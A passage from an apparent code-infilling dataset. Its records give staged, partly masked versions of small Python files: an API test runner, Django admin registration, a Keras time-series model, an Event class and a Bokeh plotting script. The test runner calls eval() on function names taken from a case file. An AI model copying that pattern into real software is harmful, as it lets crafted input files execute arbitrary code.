_expect_value = trans_type(_['val']['value'], _['val'][\n 'type'])\n _real_value = res.get(_var)\n if _.get('cmp') == '==':\n assert _expect_value == _real_value, 'Not equal! \\n\\tExpect: {}\\n\\tGot: {}'.format(\n _expect_value, _real_value)\n except AssertionError as e:\n self._step_result.append(self.FAIL)\n self._step_msg.append(e.message)\n else:\n self._step_result.append(self.PASS)\n self._step_msg.append('Passed!')\n self._passed = all(self._step_result)\n\n def save_result(self):\n \"\"\"\n save result for this test\n 1) print to console\n 2) record to mysql\n 3) upload to testlink\n \"\"\"\n self.print_to_console()\n\n def print_to_console(self):\n if self._passed:\n print('All steps passed for case: {}'.format(self._case_dict.\n get('name')))\n else:\n err('Failed on case: {}'.format(self._case_dict.get('name')))\n step_length = range(1, len(self._step_result) + 1)\n for i, result, msg in zip(step_length, self._step_result, self.\n _step_msg):\n if result == self.FAIL:\n err('Step {} failed for reason:\\n\\t{}'.format(i, msg))\n\n\nif __name__ == '__main__':\n testcase = OneCase(\n '/Users/eacon/github/APIAutoTestFramework/case/sample.json')\n testcase.run()\n",
"step-5": "from src.testcase.case import Case\nfrom src.utils import *\nfrom src.protocol.register import get_conn\nfrom src.precondition import *\n\n\nclass OneCase(object):\n \"\"\"\n Main flow of running one case's autotest\n \"\"\"\n PASS = True\n FAIL = False\n\n def __init__(self, case_path, *args, **kwargs):\n self._case_path = str(case_path)\n self._case_dict = {}\n self._step_result = []\n self._step_msg = []\n self._passed = False\n\n def run(self):\n self.load_case(self._case_path)\n self.satisfy_precondition(self._case_dict)\n self.exec_steps(self._case_dict)\n self.save_result()\n\n def load_case(self, case_path):\n self._case_dict = Case(file_path=case_path).case_dict\n\n def satisfy_precondition(self, case_dict):\n pre = case_dict.get('precondition')\n if pre:\n # pre functions\n func_list = pre.get('prefunction')\n for func in func_list:\n _func = eval(func.get('func_name'))\n _args = {_.get('name'): trans_type(_.get('value'), _.get('type')) for _ in func.get('args')}\n _func(**_args)\n # dependency\n check_dependency(pre.get('dependency'))\n\n def check_dependency(self):\n pass # ToDo\n\n def exec_steps(self, case_dict):\n \"\"\"\n \"\"\"\n for step in case_dict.get('step'):\n # input\n _input = step.get('input')\n res = {}\n for protocol, _args in _input.iteritems():\n req = get_conn(protocol)(**_args)\n res = req.response\n # compare output\n _output = step.get('output')\n if _output.get('strict'):\n pass # ToDo\n try:\n for _ in _output.get('expect'):\n _var = _.get('var')\n _expect_value = trans_type(_['val']['value'], _['val']['type'])\n _real_value = res.get(_var)\n if _.get('cmp') == '==':\n assert _expect_value == _real_value, \"Not equal! \\n\\tExpect: {}\\n\\tGot: {}\".format(\n _expect_value, _real_value)\n except AssertionError as e:\n self._step_result.append(self.FAIL)\n self._step_msg.append(e.message)\n else:\n self._step_result.append(self.PASS)\n self._step_msg.append('Passed!')\n self._passed = all(self._step_result)\n\n def save_result(self):\n \"\"\"\n save result for this test\n 1) print to console\n 2) record to mysql\n 3) upload to testlink\n \"\"\"\n self.print_to_console()\n\n def print_to_console(self):\n if self._passed:\n print('All steps passed for case: {}'.format(self._case_dict.get('name')))\n else:\n err('Failed on case: {}'.format(self._case_dict.get('name')))\n step_length = range(1, len(self._step_result) + 1)\n for i, result, msg in zip(step_length, self._step_result, self._step_msg):\n if result == self.FAIL:\n err('Step {} failed for reason:\\n\\t{}'.format(i, msg))\n\n\nif __name__ == '__main__':\n testcase = OneCase('/Users/eacon/github/APIAutoTestFramework/case/sample.json')\n testcase.run()",
"step-ids": [
7,
9,
10,
13,
14
]
}
|
[
7,
9,
10,
13,
14
] |
from django.contrib import admin
from .models import Contactus,ContactusAdmin,Company,CompanyAdmin,Products,ProductsAdmin,Brands,BrandsAdmin
# Register your models here.
admin.site.register(Contactus,ContactusAdmin),
admin.site.register(Company,CompanyAdmin),
admin.site.register(Products,ProductsAdmin),
admin.site.register(Brands,BrandsAdmin),
|
normal
|
{
"blob_id": "9586dc118be4388491770d823a38e8068e3b91cb",
"index": 5960,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nadmin.site.register(Contactus, ContactusAdmin),\nadmin.site.register(Company, CompanyAdmin),\nadmin.site.register(Products, ProductsAdmin),\nadmin.site.register(Brands, BrandsAdmin),\n",
"step-3": "from django.contrib import admin\nfrom .models import Contactus, ContactusAdmin, Company, CompanyAdmin, Products, ProductsAdmin, Brands, BrandsAdmin\nadmin.site.register(Contactus, ContactusAdmin),\nadmin.site.register(Company, CompanyAdmin),\nadmin.site.register(Products, ProductsAdmin),\nadmin.site.register(Brands, BrandsAdmin),\n",
"step-4": "from django.contrib import admin\nfrom .models import Contactus,ContactusAdmin,Company,CompanyAdmin,Products,ProductsAdmin,Brands,BrandsAdmin\n# Register your models here.\n\nadmin.site.register(Contactus,ContactusAdmin),\nadmin.site.register(Company,CompanyAdmin),\nadmin.site.register(Products,ProductsAdmin),\nadmin.site.register(Brands,BrandsAdmin),",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
dataset = pd.read_csv('mgdata.dat.csv')
training_set = dataset.iloc[:1100, 1:2].values
X_train=[]
y_train=[]
for i in range(20,1090):
X_train.append(training_set[i-20:i,0])
y_train.append(training_set[i,0])
X_train=np.asarray(X_train)
y_train=np.asarray(y_train)
import keras
from keras.models import Sequential
from keras.layers import Dense
# Initialising the ANN
classifier = Sequential()
# Adding the input layer and the first hidden layer
classifier.add(Dense(output_dim = 35, init = 'uniform', activation = 'relu', input_dim = 20))
# Adding the second hidden layer
classifier.add(Dense(output_dim = 35, init = 'uniform', activation = 'relu'))
# Adding the third hidden layer
classifier.add(Dense(output_dim = 35, init = 'uniform', activation = 'relu'))
# Adding the output layer
classifier.add(Dense(output_dim = 1, init = 'uniform', activation = 'linear'))
# Compiling the ANN
classifier.compile(optimizer = 'adam', loss = 'mean_squared_error', metrics = [])
# Fitting the ANN to the Training set
history =classifier.fit(X_train, y_train, batch_size =8, nb_epoch = 60,validation_split=0.03)
dataset_test=dataset.iloc[1100:1110, 1:2].values
y_test=dataset.iloc[1100:1110, 1:2].values
dataset_test=pd.DataFrame(dataset_test)
dataset_train=pd.DataFrame(training_set)
dataset_total = pd.concat((dataset_train, dataset_test), axis = 0)
inputs = dataset_total[len(dataset_total) - len(dataset_test) - 20:].values
inputs = inputs.reshape(-1,1)
X_test = []
for i in range(20,30):
X_test.append(inputs[i-20:i, 0])
X_test = np.array(X_test)
predicted = classifier.predict(X_test)
# Visualising the results
plt.plot(y_test, color = 'red', label="real" )
plt.plot(predicted, color = 'blue', label="predicted")
plt.legend()
plt.show()
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
|
normal
|
{
"blob_id": "28a3763715f5405f8abe2de17ed5f9df1019278b",
"index": 6878,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(20, 1090):\n X_train.append(training_set[i - 20:i, 0])\n y_train.append(training_set[i, 0])\n<mask token>\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu',\n input_dim=20))\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu'))\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu'))\nclassifier.add(Dense(output_dim=1, init='uniform', activation='linear'))\nclassifier.compile(optimizer='adam', loss='mean_squared_error', metrics=[])\n<mask token>\nfor i in range(20, 30):\n X_test.append(inputs[i - 20:i, 0])\n<mask token>\nplt.plot(y_test, color='red', label='real')\nplt.plot(predicted, color='blue', label='predicted')\nplt.legend()\nplt.show()\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper left')\nplt.show()\n",
"step-3": "<mask token>\ndataset = pd.read_csv('mgdata.dat.csv')\ntraining_set = dataset.iloc[:1100, 1:2].values\nX_train = []\ny_train = []\nfor i in range(20, 1090):\n X_train.append(training_set[i - 20:i, 0])\n y_train.append(training_set[i, 0])\nX_train = np.asarray(X_train)\ny_train = np.asarray(y_train)\n<mask token>\nclassifier = Sequential()\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu',\n input_dim=20))\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu'))\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu'))\nclassifier.add(Dense(output_dim=1, init='uniform', activation='linear'))\nclassifier.compile(optimizer='adam', loss='mean_squared_error', metrics=[])\nhistory = classifier.fit(X_train, y_train, batch_size=8, nb_epoch=60,\n validation_split=0.03)\ndataset_test = dataset.iloc[1100:1110, 1:2].values\ny_test = dataset.iloc[1100:1110, 1:2].values\ndataset_test = pd.DataFrame(dataset_test)\ndataset_train = pd.DataFrame(training_set)\ndataset_total = pd.concat((dataset_train, dataset_test), axis=0)\ninputs = dataset_total[len(dataset_total) - len(dataset_test) - 20:].values\ninputs = inputs.reshape(-1, 1)\nX_test = []\nfor i in range(20, 30):\n X_test.append(inputs[i - 20:i, 0])\nX_test = np.array(X_test)\npredicted = classifier.predict(X_test)\nplt.plot(y_test, color='red', label='real')\nplt.plot(predicted, color='blue', label='predicted')\nplt.legend()\nplt.show()\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper left')\nplt.show()\n",
"step-4": "import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\ndataset = pd.read_csv('mgdata.dat.csv')\ntraining_set = dataset.iloc[:1100, 1:2].values\nX_train = []\ny_train = []\nfor i in range(20, 1090):\n X_train.append(training_set[i - 20:i, 0])\n y_train.append(training_set[i, 0])\nX_train = np.asarray(X_train)\ny_train = np.asarray(y_train)\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nclassifier = Sequential()\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu',\n input_dim=20))\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu'))\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu'))\nclassifier.add(Dense(output_dim=1, init='uniform', activation='linear'))\nclassifier.compile(optimizer='adam', loss='mean_squared_error', metrics=[])\nhistory = classifier.fit(X_train, y_train, batch_size=8, nb_epoch=60,\n validation_split=0.03)\ndataset_test = dataset.iloc[1100:1110, 1:2].values\ny_test = dataset.iloc[1100:1110, 1:2].values\ndataset_test = pd.DataFrame(dataset_test)\ndataset_train = pd.DataFrame(training_set)\ndataset_total = pd.concat((dataset_train, dataset_test), axis=0)\ninputs = dataset_total[len(dataset_total) - len(dataset_test) - 20:].values\ninputs = inputs.reshape(-1, 1)\nX_test = []\nfor i in range(20, 30):\n X_test.append(inputs[i - 20:i, 0])\nX_test = np.array(X_test)\npredicted = classifier.predict(X_test)\nplt.plot(y_test, color='red', label='real')\nplt.plot(predicted, color='blue', label='predicted')\nplt.legend()\nplt.show()\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper left')\nplt.show()\n",
"step-5": "\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\ndataset = pd.read_csv('mgdata.dat.csv')\r\ntraining_set = dataset.iloc[:1100, 1:2].values\r\n\r\nX_train=[]\r\ny_train=[]\r\nfor i in range(20,1090):\r\n X_train.append(training_set[i-20:i,0])\r\n y_train.append(training_set[i,0])\r\nX_train=np.asarray(X_train)\r\ny_train=np.asarray(y_train)\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n\r\n# Initialising the ANN\r\nclassifier = Sequential()\r\n\r\n# Adding the input layer and the first hidden layer\r\nclassifier.add(Dense(output_dim = 35, init = 'uniform', activation = 'relu', input_dim = 20))\r\n\r\n# Adding the second hidden layer\r\nclassifier.add(Dense(output_dim = 35, init = 'uniform', activation = 'relu'))\r\n# Adding the third hidden layer\r\nclassifier.add(Dense(output_dim = 35, init = 'uniform', activation = 'relu'))\r\n\r\n# Adding the output layer\r\nclassifier.add(Dense(output_dim = 1, init = 'uniform', activation = 'linear'))\r\n\r\n# Compiling the ANN\r\nclassifier.compile(optimizer = 'adam', loss = 'mean_squared_error', metrics = [])\r\n\r\n# Fitting the ANN to the Training set\r\nhistory =classifier.fit(X_train, y_train, batch_size =8, nb_epoch = 60,validation_split=0.03)\r\n\r\ndataset_test=dataset.iloc[1100:1110, 1:2].values\r\ny_test=dataset.iloc[1100:1110, 1:2].values\r\ndataset_test=pd.DataFrame(dataset_test)\r\ndataset_train=pd.DataFrame(training_set)\r\n\r\n\r\ndataset_total = pd.concat((dataset_train, dataset_test), axis = 0)\r\ninputs = dataset_total[len(dataset_total) - len(dataset_test) - 20:].values\r\n\r\n\r\ninputs = inputs.reshape(-1,1)\r\n\r\nX_test = []\r\nfor i in range(20,30):\r\n X_test.append(inputs[i-20:i, 0])\r\nX_test = np.array(X_test)\r\n\r\npredicted = classifier.predict(X_test)\r\n\r\n\r\n# Visualising the results\r\nplt.plot(y_test, color = 'red', label=\"real\" )\r\nplt.plot(predicted, color = 'blue', label=\"predicted\")\r\nplt.legend()\r\nplt.show()\r\n\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.title('model loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'validation'], loc='upper left')\r\nplt.show()\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import datetime
class Event(object):
def __init__(self):
self.id = None
self.raw = None
self.create_dt = datetime.datetime.now()
self.device_id = None
self.collector_id = None
self.device_hostname = None
self.device_domain_name = None
self.device_ip_address = None
self.types = []
def to_dict(self):
d = {}
for item in self.__dict__:
val = getattr(self, item)
if val != None:
d[item] = val
return d
|
normal
|
{
"blob_id": "7554b00f8c4d40f1d3ee2341f118048ca7ad10ea",
"index": 709,
"step-1": "<mask token>\n\n\nclass Event(object):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Event(object):\n <mask token>\n\n def to_dict(self):\n d = {}\n for item in self.__dict__:\n val = getattr(self, item)\n if val != None:\n d[item] = val\n return d\n",
"step-3": "<mask token>\n\n\nclass Event(object):\n\n def __init__(self):\n self.id = None\n self.raw = None\n self.create_dt = datetime.datetime.now()\n self.device_id = None\n self.collector_id = None\n self.device_hostname = None\n self.device_domain_name = None\n self.device_ip_address = None\n self.types = []\n\n def to_dict(self):\n d = {}\n for item in self.__dict__:\n val = getattr(self, item)\n if val != None:\n d[item] = val\n return d\n",
"step-4": "import datetime\n\n\nclass Event(object):\n\n def __init__(self):\n self.id = None\n self.raw = None\n self.create_dt = datetime.datetime.now()\n self.device_id = None\n self.collector_id = None\n self.device_hostname = None\n self.device_domain_name = None\n self.device_ip_address = None\n self.types = []\n\n def to_dict(self):\n d = {}\n for item in self.__dict__:\n val = getattr(self, item)\n if val != None:\n d[item] = val\n return d\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
import json
from bokeh.plotting import figure, output_file
from bokeh.io import show
from bokeh.palettes import inferno
from bokeh.models import ColumnDataSource, FactorRange
from bokeh.transform import factor_cmap
from bokeh.models import HoverTool
# from bokeh.io import export_svgs
def read_summary(summary_file):
return json.loads(open(summary_file, "r").read())
def get_descriptions(summary):
d = {}
for o in summary["ontology_events"]:
print(o)
d[o] = summary["ontology_events"][o].get(
'description', summary["ontology_events"][o]['method']) + '_' + str(o)
return(d)
def plot_totals(summary):
descriptions = get_descriptions(summary)
totals = {}
for event in summary['ontology_events'].keys():
totals[str(event)] = {'genes': [],
'rxns': [],
'terms': []}
# genes
for gene in summary['genes']:
for term in summary['genes'][gene]['terms']:
for event in summary['genes'][gene]['terms'][term]:
totals[str(event)]['genes'].append(gene)
# terms
for term in summary['terms']:
for event in summary['terms'][term]:
totals[str(event)]['terms'].append(term)
# rxns
for rxn in summary['rxns']:
for event in summary['rxns'][rxn]:
totals[str(event)]['rxns'].append(rxn)
# sums
events = []
types = ['genes', 'terms', 'rxns']
gene_counts = []
rxn_counts = []
term_counts = []
for event in totals:
events.append(descriptions[event])
gene_counts.append(len(set(totals[event]['genes'])))
rxn_counts.append(len(set(totals[event]['rxns'])))
term_counts.append(len(set(totals[event]['terms'])))
data = {'events': events,
'genes': gene_counts,
'terms': term_counts,
'rxns': rxn_counts
}
x = [(event, type) for event in events for type in types]
counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())
source = ColumnDataSource(data=dict(x=x, counts=counts))
p = figure(y_range=FactorRange(*x),
plot_height=400,
plot_width=1000,
title="Unique Counts per Annotation Event",
tools="wheel_zoom,box_zoom,reset,save")
p.hbar(y='x',
right='counts',
height=0.9,
source=source,
line_color="black",
fill_color=factor_cmap('x',
palette=inferno(len(types)),
factors=types,
start=1,
end=2))
p.x_range.start = 0
p.y_range.range_padding = 0.1
p.yaxis.major_label_orientation = "horizontal"
p.yaxis.subgroup_label_orientation = "horizontal"
p.yaxis.group_label_orientation = "horizontal"
p.ygrid.grid_line_color = None
p.title.text_font_size = '12pt'
p.xaxis.major_label_text_font_size = "12pt"
p.yaxis.major_label_text_font_size = "12pt"
p.yaxis.group_text_font_size = "12pt"
p.add_tools(HoverTool(tooltips=[("Type", "@x"), ("Count", "@counts")]))
return(p)
#summary = read_summary("PT19DW.5.json")
summary = read_summary("PT19DW.7.json")
output_file("totals.html", title="Totals")
totals = plot_totals(summary)
show(totals)
|
normal
|
{
"blob_id": "7036ae5f74e6cb04518c20bb52122a1dfae76f23",
"index": 712,
"step-1": "<mask token>\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\n<mask token>\noutput_file('totals.html', title='Totals')\n<mask token>\nshow(totals)\n",
"step-3": "<mask token>\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\nsummary = read_summary('PT19DW.7.json')\noutput_file('totals.html', title='Totals')\ntotals = plot_totals(summary)\nshow(totals)\n",
"step-4": "import json\nfrom bokeh.plotting import figure, output_file\nfrom bokeh.io import show\nfrom bokeh.palettes import inferno\nfrom bokeh.models import ColumnDataSource, FactorRange\nfrom bokeh.transform import factor_cmap\nfrom bokeh.models import HoverTool\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\nsummary = read_summary('PT19DW.7.json')\noutput_file('totals.html', title='Totals')\ntotals = plot_totals(summary)\nshow(totals)\n",
"step-5": "import json\n\nfrom bokeh.plotting import figure, output_file\nfrom bokeh.io import show\nfrom bokeh.palettes import inferno\nfrom bokeh.models import ColumnDataSource, FactorRange\nfrom bokeh.transform import factor_cmap\nfrom bokeh.models import HoverTool\n# from bokeh.io import export_svgs\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, \"r\").read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary[\"ontology_events\"]:\n print(o)\n d[o] = summary[\"ontology_events\"][o].get(\n 'description', summary[\"ontology_events\"][o]['method']) + '_' + str(o)\n return(d)\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [],\n 'rxns': [],\n 'terms': []}\n\n # genes\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n\n # terms\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n\n # rxns\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n\n # sums\n events = []\n types = ['genes', 'terms', 'rxns']\n\n gene_counts = []\n rxn_counts = []\n term_counts = []\n\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n\n data = {'events': events,\n 'genes': gene_counts,\n 'terms': term_counts,\n 'rxns': rxn_counts\n }\n\n x = [(event, type) for event in events for type in types]\n\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n\n p = figure(y_range=FactorRange(*x),\n plot_height=400,\n plot_width=1000,\n title=\"Unique Counts per Annotation Event\",\n tools=\"wheel_zoom,box_zoom,reset,save\")\n\n p.hbar(y='x',\n right='counts',\n height=0.9,\n source=source,\n line_color=\"black\",\n fill_color=factor_cmap('x',\n palette=inferno(len(types)),\n factors=types,\n start=1,\n end=2))\n\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = \"horizontal\"\n p.yaxis.subgroup_label_orientation = \"horizontal\"\n p.yaxis.group_label_orientation = \"horizontal\"\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = \"12pt\"\n p.yaxis.major_label_text_font_size = \"12pt\"\n p.yaxis.group_text_font_size = \"12pt\"\n 